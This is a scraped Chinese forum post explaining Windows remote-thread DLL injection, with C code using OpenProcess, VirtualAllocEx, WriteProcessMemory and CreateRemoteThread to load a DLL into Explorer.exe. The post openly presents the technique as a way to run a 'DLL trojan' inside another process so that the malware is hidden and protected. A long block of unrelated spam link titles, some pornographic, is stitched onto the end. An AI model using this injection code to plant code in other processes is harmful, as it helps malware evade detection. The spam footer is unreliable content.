<dfn id="is4kg"></dfn>
  • <ul id="is4kg"></ul>
  • <abbr id="is4kg"></abbr>
  • <ul id="is4kg"></ul>
    <bdo id="is4kg"></bdo>

    曙海教育集團論壇開發語言培訓專區VB語言 → 用vb和c語言來進行遠程線形技術


      共有7928人關注過本帖樹形打印

    主題:用vb和c語言來進行遠程線形技術

    美女呀,離線,留言給我吧!
    wangxinxin
      1樓 個性首頁 | 博客 | 信息 | 搜索 | 郵箱 | 主頁 | UC


    加好友 發短信
    等級:青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊:2010-11-12 11:08:23
    用vb和c語言來進行遠程線形技術  發帖心情 Post By:2010-12-14 14:39:24


    遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。 但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程耶!)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。例如在遠程進程內部啟動一個DLL木馬(與進入進程內部相比,啟動一個DLL木馬是小意思,實際上我們可以隨意篡改那個遠程進程的數據)。

      首先,我們通過OpenProcess 來打開我們試圖嵌入的進程(如果遠程進程不允許打開,那么嵌入就無法進行了,這往往是由于權限不足引起的,解決方法是通過種種途徑提升本地進程的權限) 

     hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | file://允許遠程創建線程 
                    PROCESS_VM_OPERATION | file://允許遠程VM操作 
                    PROCESS_VM_WRITE,//允許遠程VM寫 
                    FALSE, dwRemoteProcessId ) 

      由于我們后面需要寫入遠程進程的內存地址空間并建立遠程線程,所以需要申請足夠的權限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。 

      然后,我們可以建立LoadLibraryW函數這個線程來啟動我們的DLL木馬,LoadLibraryW函數是在kernel32.dll中定義的,用來加載DLL文件,它只有一個參數,就是DLL文件的絕對路徑名pszLibFileName,(也就是木馬DLL的全路徑文件名),但是由于木馬DLL是在遠程進程內調用的,所以我們首先還需要將這個文件名復制到遠程地址空間:(否則遠程線程是無法讀到這個參數的) 

     file://計算DLL路徑名需要的內存空間 
     int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 
     file://使用VirtualAllocEx函數在遠程進程的內存地址空間分配DLL文件名緩沖區 
     pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
                MEM_COMMIT, PAGE_READWRITE); 
     file://使用WriteProcessMemory函數將DLL的路徑名復制到遠程進程的內存空間 
     iReturnCode = WriteProcessMemory(hRemoteProcess, 
                pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
     file://計算LoadLibraryW的入口地址 
     PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 
         GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 

      萬事俱備,我們通過建立遠程線程時的地址pfnStartAddr(實際上就是LoadLibraryW的入口地址)和傳遞的參數pszLibFileRemote(實際上是我們復制過去的木馬DLL的全路徑文件名)在遠程進程內啟動我們的木馬DLL: 

     file://啟動遠程線程LoadLibraryW,通過遠程線程調用用戶的DLL文件 
     hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, 
                     pfnStartAddr, pszLibFileRemote, 0, NULL); 

      至此,遠程嵌入順利完成,為了試驗我們的DLL是不是已經正常的在遠程線程運行,我編寫了以下的測試DLL: 

     BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved) 
       { 
        char szProcessId[64] ; 
        switch ( reason ) 
         { 
          case DLL_PROCESS_ATTACH: 
           { 
             file://獲取當前進程ID 
             _itoa ( GetCurrentProcessId(), szProcessId, 10 ); 
             MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK ); 
           } 
          default: 
          return TRUE; 
         } 
       } 

      當我使用RmtDll.exe程序將這個TestDLL.dll嵌入Explorer.exe進程后(PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具也能看到 

       Process ID: 1208 
       C:WINNTExplorer.exe (0x00400000) 
       …… 
       C:TestDLL.dll (0x100000000) 
       …… 

      這證明TestDLL.dll已經在Explorer.exe進程內正確地運行了。 

      無論是使用特洛伊DLL還是使用遠程線程,都是讓木馬的核心代碼運行于別的進程的內存空間,這樣不僅能很好地隱藏自己,也能更好的保護自己。


    支持(0中立(0反對(0單帖管理 | 引用 | 回復 回到頂部

    返回版面帖子列表

    用vb和c語言來進行遠程線形技術








    簽名
    主站蜘蛛池模板: eeuss免费影院| 亚洲福利秒拍一区二区| 4hc88四虎www在线影院短视频| 成人免费看www网址入口| 亚洲成AV人片久久| 男人桶女人视频不要下载| 国产在线观看91精品不卡| 99热这里只有精品免费播放| 性满足久久久久久久久| 亚洲1区1区3区4区产品乱码芒果| 欧美超强性xxxxx| 噜噜噜狠狠夜夜躁| 青草青草久热精品视频在线观看| 国内精品伊人久久久久AV一坑| 中文字幕一区日韩精品| 日本成人在线看| 亚洲成av人片在线观看天堂无码| 狠狠综合久久久久尤物丿| 国产中文99视频在线观看| 黄页在线播放网址| 在线免费观看h片| 公交车上被弄进走不动| 韩国高清在线观看| 国产精品视频无圣光一区| 上原瑞穗最全番号| 无码人妻精品一区二区三区久久久| 亚洲国产香蕉视频欧美| 波多野结衣影视作品| 啊灬啊灬别停啊灬用力啊免费| 蕾丝视频在线看片国产| 国产精品久久久久久福利| eeuss影院免费直达入口| 小婷又紧又深又滑又湿好爽| 亚洲欧洲日产国码一级毛片| 男人j桶女人p免费视频| 国产三级精品三级在线观看| 高中生的放荡日记h| 国产精品毛片无遮挡| www.com.av| 女的和男的一起怼怼| 久久久久久久久久久福利|